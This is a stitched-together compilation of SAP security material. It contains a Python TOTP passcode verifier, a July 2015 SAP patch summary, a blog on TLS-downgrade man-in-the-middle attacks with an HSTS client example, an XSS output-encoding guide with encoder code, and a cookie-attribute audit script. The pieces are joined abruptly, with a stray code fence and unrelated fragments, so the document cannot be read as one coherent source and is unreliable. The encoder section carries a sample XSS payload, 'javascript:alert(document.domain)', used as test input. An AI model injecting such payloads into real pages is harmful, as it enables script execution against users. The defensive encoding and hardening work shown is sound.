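import hashlib
import hmac
import struct
import time
from typing import Callable

DIGITS = 6
STEP_SECONDS = 30
MAX_WRONG_ATTEMPTS = 5
LOCK_SECONDS = 60 * 60


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic
    truncation, then the low `digits` decimal digits, zero-padded."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = STEP_SECONDS) -> str:
    """RFC 6238: HOTP with the counter set to floor(time / step)."""
    return hotp(secret, unix_time // step)


class PasscodeVerifier:
    """Server-side check of a submitted passcode for one registered device."""

    def __init__(self, secret: bytes, window: int = 1,
                 clock: Callable[[], float] = time.time):
        self.secret = secret
        self.window = window          # accept +/- this many steps of clock drift
        self.clock = clock
        self.wrong_attempts = 0
        self.locked_until = 0
        self.last_counter = -1        # highest counter already accepted

    def verify(self, passcode: str) -> str:
        now = int(self.clock())
        if now < self.locked_until:
            return "locked"
        current = now // STEP_SECONDS
        for counter in range(current - self.window, current + self.window + 1):
            if hmac.compare_digest(hotp(self.secret, counter), passcode):
                if counter <= self.last_counter:
                    return "replay"   # a passcode is accepted only once
                self.last_counter = counter
                self.wrong_attempts = 0
                return "ok"
        self.wrong_attempts += 1
        if self.wrong_attempts >= MAX_WRONG_ATTEMPTS:
            self.wrong_attempts = 0
            self.locked_until = now + LOCK_SECONDS
            return "locked"
        return "wrong"

    def admin_unlock(self) -> None:
        """Models the manual unlock a tenant administrator performs."""
        self.locked_until = 0
        self.wrong_attempts = 0


if __name__ == "__main__":
    # RFC 6238 test secret (ASCII "12345678901234567890"); real secrets are random
    demo_secret = b"12345678901234567890"
    print("passcode at t=59 :", totp(demo_secret, 59))          # 287082
    print("current passcode :", totp(demo_secret, int(time.time())))
```

The RFC 6238 test vectors check the generator: at Unix time 59 the 6-digit code for the test secret is 287082, the low six digits of the RFC's 8-digit value 94287082. The replay check matters because a passcode stays valid for the whole 30-second step plus the drift window; without it, a phished code can be reused within that window. The lockout counter is reset by a correct passcode, so a legitimate user who mistypes once is not pushed towards the lock.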

 

Ensuring a higher level of security for your applications is a matter of a few steps to enable two-factor authentication. It really is that easy, and it really is worth it.

 

For more information on other SAP Cloud Identity service features, see the official documentation.

SAP has released the monthly critical patch update for July 2015. This patch update closes a number of vulnerabilities in SAP products, some of them in the SAP HANA security area. The most common vulnerability type is Missing Authorization Check. This month, one vulnerability found by ERPScan researcher Alexander Polyakov was closed.

Issues that were patched with the help of ERPScan

 

Below are the details of SAP vulnerabilities that were found by ERPScan researchers.

 

  • A Missing Authorization Check vulnerability in SAP XML Data Archiving Service (CVSS Base Score: 3.5). Update is available in SAP Security Note 1945215. An attacker can use a missing authorization check to access a service without any authorization procedure and use functionality that should be restricted. This can lead to information disclosure, privilege escalation, and other attacks.


The most critical issues found by other researchers


Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Security Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:


  • 2180049: SAP ASE XPServer has a Missing Authorization Check vulnerability (CVSS Base Score: 9.3). An attacker can use it to access a service without any authorization procedure and use functionality that should be restricted. This can lead to information disclosure, privilege escalation, and other attacks. It is recommended to install this SAP Security Note to prevent risks.

 

  • 1952092: IDES ECC has a Remote Command Execution vulnerability (CVSS Base Score: 6.0). An attacker can use Remote Command Execution to run commands remotely without authorization. Executed commands will run with the privileges of the service that executes them. An attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.

 

  • 1971516: SAP SERVICE DATA DOWNLOAD has a Remote command execution vulnerability (CVSS Base Score: 6.0). An attacker can use Remote Command Execution to run commands remotely without authorization. Executed commands will run with the privileges of the service that executes them. An attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.

 

  • 2183624: SAP HANA database has an Information Disclosure vulnerability. An attacker can use Information Disclosure for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks. It is recommended to install this SAP Security Note to prevent risks.

 

 

It is highly recommended to patch all those SAP vulnerabilities to prevent business risks affecting your SAP systems.

 

SAP has traditionally thanked the security researchers from ERPScan for the vulnerabilities they found on its acknowledgment page.

First of all, let’s have a few moments of silence in remembrance of SSL now that SSL is officially dead.

 

Long live TLS!

 

That said, even though a lot of SAP customers are relying on HTTPS (TLS) to ensure the confidentiality of data in motion in their Fiori applications over public networks, there are still fundamental weaknesses, even with TLS in place, that make data disclosure possible in a man-in-the-middle attack. Consider the attack scenario in the next section.

 

 

Man in the Middle TLS Attack Scenario

A conversation that passes through a well-behaved man in the middle (say, your local Starbucks WiFi hotspot) on its way to your Fiori Gateway Server should look something like the following:

Figure_1_MITM.png

 

The well-behaved man in the middle simply routes all requests to the server, without inspecting or modifying that traffic, and routes responses from the server back to the client.

 

Now, an attacker seeking to inspect that traffic could simply drop the request on the floor and forge a redirect – which would look something like the following:

Figure_2_MITM.png

This has the effect of forcing future communication to the Fiori Gateway Server to the unencrypted HTTP protocol, allowing the attacker to inspect all traffic to the NetWeaver Gateway unencrypted. An attacker would have the luxury of viewing payment details and other types of confidential data in clear text.

Figure_3_MITM.png

 

Most supported Fiori web browsers and the Fiori client will not warn the user of the change from HTTPS to HTTP – the user would need to pay close attention to the browser's encryption "lock" icon. Some browsers (think Chrome) will issue strong warnings that alert the user to the fact that the session is being downgraded to an HTTP session, but even then many users may err on the side of "getting things done" and ignore any warning messages.

 

Likelihood of this Scenario

When measuring risk, it helps to remember that Risk = Impact * Likelihood. In the past, man-in-the-middle attack scenarios were considered esoteric or difficult to pull off - a low-likelihood scenario. Today, with the ubiquity of WiFi, this is no longer the case. In fact, an attacker with limited technical knowledge can buy a $100 Pineapple device to take advantage of this particular vulnerability. Given these attacks can be pulled off by unsophisticated users with minimal investment, the likelihood of this type of man-in-the-middle attack is orders of magnitude higher than it was even 5 years ago.

 

 

Strategies for SAP Customers to Secure Data in Motion in Fiori Applications

This said, there are several approaches SAP customers can take to address this specific risk when rolling out Fiori to devices on public networks. These include:

  1. Blocking access to the HTTP port on your NetWeaver Gateway server at the firewall. This is possibly the cheapest alternative available to SAP customers.
  2. Implementing HTTP Strict Transport Security (HSTS). This requires some modification to standard Fiori to implement and requires browsers that support HSTS. Unfortunately, not all browsers support HSTS, so this option may not be effective in BYOD scenarios.
  3. Requiring that remote devices access your Fiori Launchpad over VPN. VPN tunnels can’t be negotiated down to an “unencrypted” version. Currently, the only known way attackers can attack VPN connections is to forge reset packets to drop the tunnel, in the hope that a user will give up using VPN and will try a less secure option. On the negative side, VPN tunnels add to authentication complexity.
  4. Implementing SAP Application Protection by Mocana. This is a great offering that handles a host of security issues, including the specific man-in-the-middle attack scenario discussed here. This solution was designed to run applications securely on untrusted devices, protecting data at rest and in motion. A key feature of SAP Application Protection by Mocana is VPNs initiated from the application, so that an attacker doesn’t have the opportunity to inspect unencrypted data in motion even if they have control of the device. And, Mocana-wrapped applications can take advantage of certificate-based authentication to reduce authentication complexity to both the Gateway and the Atlas VPN appliance.
  5. SAP Customers running the Afaria MDM solution have the ability to implement policies on devices to ensure WiFi connections are only to trusted networks, or can disable WiFi altogether (controlled by the policies “Connect to Specific APs” or “Get current WiFi AP’s SSID”). Many other MDM tools have similar capabilities. Again, this is not always possible to enforce in a BYOD scenario.
  6. Implementing HTTPS Everywhere plugins for all clients. Unfortunately, as of this writing this is not a viable option in a mobile device scenario.
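To make the HSTS option (item 2) concrete, here is an added example that is not part of the original post or of any SAP product: a minimal client that keeps an HSTS policy cache with the RFC 6797 rules and applies it to the forged-redirect scenario from the figures above. The host name, header values and responses are constructed for the demonstration; the Fiori Launchpad path is used only to make the URLs look familiar.

```javascript
// Added example: a minimal HSTS-aware client (RFC 6797 semantics), written for
// this page and not taken from SAP or any browser. Host names, headers and
// responses are constructed; nothing is sent over the network.

// Parse a Strict-Transport-Security header into { maxAge, includeSubDomains }.
// Returns null when the header carries no usable max-age.
function parseHsts(value) {
  const policy = { maxAge: null, includeSubDomains: false };
  for (const part of value.split(';')) {
    const [rawName, rawValue = ''] = part.split('=');
    const name = rawName.trim().toLowerCase();
    if (name === 'max-age') {
      policy.maxAge = Number.parseInt(rawValue.trim().replace(/"/g, ''), 10);
    } else if (name === 'includesubdomains') {
      policy.includeSubDomains = true;
    }
  }
  return Number.isInteger(policy.maxAge) && policy.maxAge >= 0 ? policy : null;
}

class HstsClient {
  constructor(clock = () => Date.now()) {
    this.clock = clock;          // injectable clock so expiry can be exercised
    this.policies = new Map();   // hostname -> { expires, includeSubDomains }
  }

  // Learn a policy from a response. The header is only honoured on an HTTPS
  // response, so whoever controls the plain-HTTP path cannot plant or clear it.
  observe(urlString, headers) {
    const url = new URL(urlString);
    if (url.protocol !== 'https:') return false;
    const raw = headers['strict-transport-security'];
    if (!raw) return false;
    const policy = parseHsts(raw);
    if (!policy) return false;
    if (policy.maxAge === 0) {           // max-age=0 removes a stored policy
      this.policies.delete(url.hostname);
      return true;
    }
    this.policies.set(url.hostname, {
      expires: this.clock() + policy.maxAge * 1000,
      includeSubDomains: policy.includeSubDomains,
    });
    return true;
  }

  // Is there an unexpired policy covering this host (or a parent domain with
  // includeSubDomains)?
  isKnown(hostname) {
    for (const [host, policy] of this.policies) {
      if (policy.expires <= this.clock()) continue;
      if (hostname === host) return true;
      if (policy.includeSubDomains && hostname.endsWith('.' + host)) return true;
    }
    return false;
  }

  // Rewrite a navigation target before any request leaves the client:
  // http:// to a known host becomes https://, so there is no plain-HTTP
  // request on the wire for a middlebox to tamper with.
  enforce(urlString) {
    const url = new URL(urlString);
    if (url.protocol === 'http:' && this.isKnown(url.hostname)) {
      url.protocol = 'https:';
      if (url.port === '80') url.port = '';
    }
    return url.toString();
  }

  // Resolve a redirect Location and apply the same rule, so a downgrade
  // redirect for a known host is upgraded instead of followed verbatim.
  follow(fromUrl, location) {
    return this.enforce(new URL(location, fromUrl).toString());
  }
}

// Walk the scenario: a first visit with nothing cached, then the same forged
// redirect after the server has been seen over HTTPS with an HSTS header.
function demo() {
  let now = 0;
  const client = new HstsClient(() => now);
  const host = 'fiori.example.internal';   // constructed host name
  const launchpad = `/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html`;

  // 1. First ever visit, typed without a scheme: no policy yet, so the plain
  //    request goes out and a downgrade redirect would be followed as-is.
  const firstVisit = client.enforce(`http://${host}${launchpad}`);

  // 2. The user later reaches the server over HTTPS and the response carries
  //    HSTS (constructed header: one year, subdomains included).
  client.observe(`https://${host}/`, {
    'strict-transport-security': 'max-age=31536000; includeSubDomains',
  });

  // 3. The forged redirect to http:// from Figure 2 is now upgraded back
  //    to https:// before the client requests it.
  const afterPolicy = client.follow(`https://${host}/`, `http://${host}${launchpad}`);

  // 4. Subdomains are covered by includeSubDomains.
  const subdomain = client.enforce(`http://gw.${host}/sap/opu/odata/`);

  // 5. Once max-age has elapsed the protection lapses until the next HTTPS
  //    visit; this is why a long max-age (and preloading) matters.
  now = 31536001 * 1000;
  const expired = client.enforce(`http://${host}/`);

  return { firstVisit, afterPolicy, subdomain, expired };
}
```

The first step in demo() shows the limit of the approach that the post alludes to: a client that has never seen the server over HTTPS has no policy to enforce, which is why blocking the HTTP port at the firewall (item 1) is still worth doing alongside HSTS.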

 

 

Industry Initiatives to Address this Risk

There are several initiatives underway to address this scenario, all in various stages of adoption.

  • HTTPS Everywhere – this is a browser plugin that always attempts to connect to the web server/service via HTTPS, regardless of the link or redirect information presented.
  • HTTP Strict Transport Security (HSTS) – a response header that instructs browsers to connect to that host only over HTTPS
  • Deprecate HTTP altogether and encrypt all web traffic

Unfortunately, given the sheer number of internet-enabled servers and clients, I don’t see any of these making significant headway toward addressing this issue internet-wide in a timely manner.

 

References

SSL is dead: https://www.ciso-central.org/transport-layer-security/ssl-is-dead-long-live-tls

OS/Browser combinations supported by Fiori: http://service.sap.com/sap/support/notes/1931218

Great blog on HTTP Strict Transport Security in SAP applications: http://scn.sap.com/community/labs/blog/2014/04/26/http-strict-transport-security-hsts

Listing of HSTS Supported Browsers: http://caniuse.com/#feat=stricttransportsecurity

Generic info on SAP Application Protection by Mocana: http://www.sap.com/pc/tech/mobile/software/solutions/emm/secure-apps.html

Blog on deprecating HTTP: https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http/

From the developer’s perspective

 

For AS Java, the encoding is available as tc_sec_csi.jar. There is a static class and an interface which provide the encodings for HTML/XML, JavaScript, CSS and URL. The methods of the public class StringUtils (com.sap.security.core.server.csi.util.StringUtils) are also available:

 

  • escapeScriptEndTag(String pStr) - Prepare a string to be used for a javascript string definition with particular care about script tag.
  • escapeScriptEndTag(StringBuffer sb, String pStr) - Prepare a string to be used for a javascript string definition with particular care about script tag.
  • escapeSpace(String input) - Encode a space with +. Note that this function will call 'disableScriptSignatures'.
  • escapeToAttributeValue(String input) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToAttributeValue(StringBuffer sb, String input, int maxLength) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToAttributeValue(String input, int maxLength) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToHTML(String input) - Encode a string for output between tags (CASE1)
  • escapeToHTML(StringBuffer sb, String input, int maxLength) - Encode a string for output between tags (CASE1)
  • escapeToHTML(String input, int maxLength) - Encode a string for output between tags (CASE1)
  • escapeToJS(String input) - Encode a string inside a JS string declaration (CASE5)
  • escapeToJS(StringBuffer sb, String input, int maxLength) - Encode a string inside a JS string declaration (CASE5)
  • escapeToJS(String input, int maxLength) - Encode a string inside a JS string declaration (CASE5)
  • escapeToURL(String input) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • escapeToURL(StringBuffer sb, String input, int maxLength) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • escapeToURL(String input, int maxLength) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • urlEncode(String s) - A trivial replacement of URLEncoder.encode
  • urlEncode(StringBuffer sb, String s, char[] forceEncode) - This is an extended version of the URLEncoder.encode method.
  • urlEncode(String s, char[] forceEncode) - This is an extended version of the URLEncoder.encode method.


CASE1 (Output BETWEEN tags)


<head>
<title>[CASE1]</title>
</head>
<table>
  <tr>
  <td>Username</td>
  <td>[CASE1]</td>
  </tr>
</table>

 

CASE2 (Output INSIDE tags, but output is not a URL)

 

<form name="CASE2">
  <input type="text" name="user" value="[CASE2]">
  <input type="text" name="user" value='[CASE2]'>
</form>
<a name="[CASE2]">Click here</a>

 

CASE3 (Output is a URL)


<a href="[CASE3]" style="[CASE3]"><img src="[CASE3]"
lowsrc="[CASE3]"></a>

 

CASE4 (Output inside a SCRIPT context, but output is not a string declaration)

 

<script>
var a = [CASE4];
[CASE4];
</script>

 

CASE5 (Output is a string declaration in a script)

 

<script>
var a = '[CASE5]';
alert("[CASE5]");
</script>

 

The class name is XSSEncoder (class name with package name: com.sap.security.core.server.csi.XSSEncoder).

 

The interface is IXSSEncoder(interface with package name: com.sap.security.core.server.csi.IXSSEncoder). The interface can be retrieved with com.sap.security.core.server.csi.XSSEncoder.getInstance().

 

The class XSSEncoder and the interface IXSSEncoder are the successors of the class StringUtils (see SAP Security Note 866020 [10] and its update Note 1601461 [11]), so the same dependencies have to be fulfilled, for example, a runtime reference to the J2EE library security.class or tc/bl/security/lib and a compiler reference to tc_sec_csi.jar.

 

Context      Method

HTML / XML   out = XSSEncoder.encodeHTML( val ) and XSSEncoder.encodeXML( val );
JavaScript   out = XSSEncoder.encodeJavaScript( val );
URL          out = XSSEncoder.encodeURL( val );
CSS          out = XSSEncoder.encodeCSS( val );

 

For information about the delivery of these extensions, see SAP Security Note 1590008 [12].


WebDynpro Java

 

For WebDynpro Java, you do not have to handle XSS encoding yourself; the framework ensures it.


SAP UI Development Kit for HTML5

 

For the SAP UI Development Kit for HTML5, the encoding functions are implemented as a jQuery plug-in in framework/_core/src/main/js/jquery.sap.encoder.js.

 

The functions to use for the different contexts are:

Context      Function
HTML / XML   jQuery.sap.encodeHTML(sValue) and jQuery.sap.encodeXML(sValue)
JavaScript   jQuery.sap.encodeJS(sValue)
URL          jQuery.sap.encodeURL(sValue)
CSS          jQuery.sap.encodeCSS(sValue)
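The five output contexts (CASE1 to CASE5) and the two encoder families above share one idea: the encoder must match the context the value lands in. The following is an added example written for this page, not the XSSEncoder or jquery.sap.encoder.js code, and it uses its own allowlist-based encoders (only letters, digits, space and a few punctuation characters pass; everything else is escaped in the form the context understands). It also goes slightly beyond the page in handling CASE4, for which no string encoder exists, by validating the value instead. The untrusted inputs are constructed samples.

```javascript
// Added example: context-specific output encoders modelled on the CASE1-CASE5
// contexts above. Allowlist approach written for this page; not SAP code.
// The untrusted input strings at the bottom are constructed samples.

const SAFE_TEXT = /[A-Za-z0-9 .,_-]/;   // left untouched in HTML and JS contexts
const SAFE_CSS = /[A-Za-z0-9]/;         // CSS is stricter: alphanumerics only

// Upper-case hex code point, zero-padded to the requested width.
function hex(ch, width) {
  return ch.codePointAt(0).toString(16).toUpperCase().padStart(width, '0');
}

// CASE1 / CASE2: text between tags or inside a quoted attribute value.
// Everything outside the allowlist becomes a numeric character reference,
// so neither a tag nor a closing quote can be introduced.
function encodeHTML(value) {
  return Array.from(String(value), ch => (SAFE_TEXT.test(ch) ? ch : `&#x${hex(ch, 2)};`)).join('');
}

// CASE5: inside a JS string literal. Backslash-hex escapes stop quotes,
// backslashes and "</script>" from ending the literal or the script block.
function encodeJS(value) {
  return Array.from(String(value), ch => {
    if (SAFE_TEXT.test(ch)) return ch;
    const cp = ch.codePointAt(0);
    if (cp < 0x100) return `\\x${hex(ch, 2)}`;
    return cp <= 0xffff ? `\\u${hex(ch, 4)}` : `\\u{${hex(ch, 4)}}`;
  }).join('');
}

// CASE3: a value that becomes part of a URL. Percent-encode everything except
// unreserved characters, including the ones encodeURIComponent leaves alone,
// so a scheme separator such as ':' cannot survive.
function encodeURL(value) {
  return encodeURIComponent(String(value)).replace(/[!'()*]/g, ch => `%${hex(ch, 2)}`);
}

// CSS context: same allowlist idea with CSS backslash-hex escapes, which are
// terminated by a space so the following character is never swallowed.
function encodeCSS(value) {
  return Array.from(String(value), ch => (SAFE_CSS.test(ch) ? ch : `\\${hex(ch, 1)} `)).join('');
}

// The templates from the CASE snippets above, each paired with the encoder
// that matches its context.
const CONTEXTS = {
  CASE1: v => `<td>${encodeHTML(v)}</td>`,
  CASE2: v => `<input type="text" name="user" value="${encodeHTML(v)}">`,
  CASE3: v => `<a href="/sap/bc/profile?user=${encodeURL(v)}">profile</a>`,
  // CASE4 has no string encoder: a value that is not a string literal must be
  // validated against the shape the script expects (here: an integer).
  CASE4: v => {
    if (!/^-?\d{1,15}$/.test(String(v))) throw new Error('CASE4 value must be an integer');
    return `var a = ${v};`;
  },
  CASE5: v => `var a = '${encodeJS(v)}';`,
};

function render(context, value) {
  const template = CONTEXTS[context];
  if (!template) throw new Error(`no encoder for context ${context}`);
  return template(value);
}

// Why the encoder has to match the context: the browser decodes character
// references inside an attribute value before parsing the URL, so an
// HTML-encoded "javascript:" link in a href still runs; the URL encoder turns
// ':' into '%3A', which the browser then reads as a harmless relative path.
function compareHrefEncodings(value) {
  return {
    wrong: `<a href="${encodeHTML(value)}">`,
    right: `<a href="${encodeURL(value)}">`,
  };
}

// Constructed untrusted inputs run through every context.
const SAMPLE_NAME = 'O\'Neil <b>"x"</b>';
const SAMPLE_LINK = 'javascript:alert(document.domain)';
const SAMPLES = {
  case1: render('CASE1', SAMPLE_NAME),
  case2: render('CASE2', SAMPLE_NAME),
  case3: render('CASE3', SAMPLE_LINK),
  case5: render('CASE5', SAMPLE_NAME),
  href: compareHrefEncodings(SAMPLE_LINK),
};
```

A practical way to use this with the SAP encoders is as a mapping exercise: CASE1/CASE2 correspond to encodeHTML, CASE3 to encodeURL, CASE5 to encodeJS (or encodeJavaScript on AS Java), and CASE4 to input validation rather than any encoder.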

From the administrator’s perspective

 

The administrator should set the following parameters to improve security:

  • Global_app_config/session_config/sessionTimeout = 900. Enable a session timeout to minimize the potential attack window.
  • SystemCookiesDataProtection = true. Declaring a cookie as HttpOnly increases the security of your system because it eliminates access to this cookie in the Web browser from client-side scripts, applets, plugins, and the like. Setting the HttpOnly flag prevents the cookie from being sent to a malicious host through an XSS vulnerability.
  • ume.logon.httponlycookie = True. Logon tickets are cookies that are used for user authentication and Single Sign-On in the J2EE Engine. The value “True” means that the session information can be transmitted only by HTTP, and reading the cookie via document.cookie (a typical XSS technique) is not possible.
  • SessionIPProtectionEnabled = True. Specifies whether session IP protection is enabled. When this property is set to true, the HTTP session cannot be accessed from different IPs. Only requests from the IP that started the session are processed.
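The two cookie parameters above can be verified from the outside by looking at the Set-Cookie headers the server actually returns. The following is an added example written for this page (not SAP code): it parses Set-Cookie lines and reports session cookies that lack the HttpOnly or Secure attribute. The header lines and cookie values are constructed samples; the cookie names are only used to mark which cookies carry a session.

```javascript
// Added example: audit Set-Cookie headers for HttpOnly and Secure, i.e. check
// what ume.logon.httponlycookie and SystemCookiesDataProtection are meant to
// produce. Written for this page, not SAP code; header lines are constructed.

// Parse one Set-Cookie header line into { name, httpOnly, secure }.
// Attribute names are matched case-insensitively, as browsers do.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: false,
    secure: false,
  };
  for (const attr of attrs) {
    const key = attr.split('=')[0].trim().toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
  }
  return cookie;
}

// Session-bearing cookies should be neither readable from script (HttpOnly)
// nor sent over plain HTTP (Secure). Returns one finding per missing attribute.
function auditCookies(setCookieLines, sessionCookieNames) {
  const findings = [];
  for (const line of setCookieLines) {
    const c = parseSetCookie(line);
    if (!sessionCookieNames.has(c.name)) continue;
    if (!c.httpOnly) findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
    if (!c.secure) findings.push(`${c.name}: missing Secure (sent over plain HTTP)`);
  }
  return findings;
}

// Constructed response headers: the logon ticket is set correctly, the
// servlet session cookie is not, the theme cookie carries no session.
const SAMPLE_HEADERS = [
  'MYSAPSSO2=PLACEHOLDER_TICKET; Path=/; Domain=.example.internal; HttpOnly; Secure',
  'JSESSIONID=PLACEHOLDER_ID; Path=/',
  'theme=sap_belize; Path=/',
];
const SESSION_COOKIES = new Set(['MYSAPSSO2', 'JSESSIONID']);

// Expected: two findings, both for JSESSIONID.
const FINDINGS = auditCookies(SAMPLE_HEADERS, SESSION_COOKIES);
```

Run this against a captured response after changing the parameters to confirm that the logon ticket and the servlet session cookie both come back with HttpOnly and Secure; a finding for a cookie that is not in your session list can be ignored.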

From the incident response perspective

 

To be able to identify an actual attack that exploited the XSS vulnerability, or other web-based vulnerabilities, it is recommended to configure the following parameters.

  • LogCLF = TRUE in configuration file http.properties enables logging in CEF format.
  • ArchiveOldLogFiles = ON. The Log Configurator service provides an option for automatic archiving of log files. Logs are written into a set of files. When the last file is completed, the new logs start overwriting the old log files. If there is no archiving for access logs, all logs soon will be overwritten.
  • Enable Additional information logging [13].
  • HttpTrace= Enable. To enable HTTP Trace for more information run ConfigTool. Open the Properties tab of the HTTP Provider Service running on the dispatcher and assign the appropriate value to the HttpTrace property.
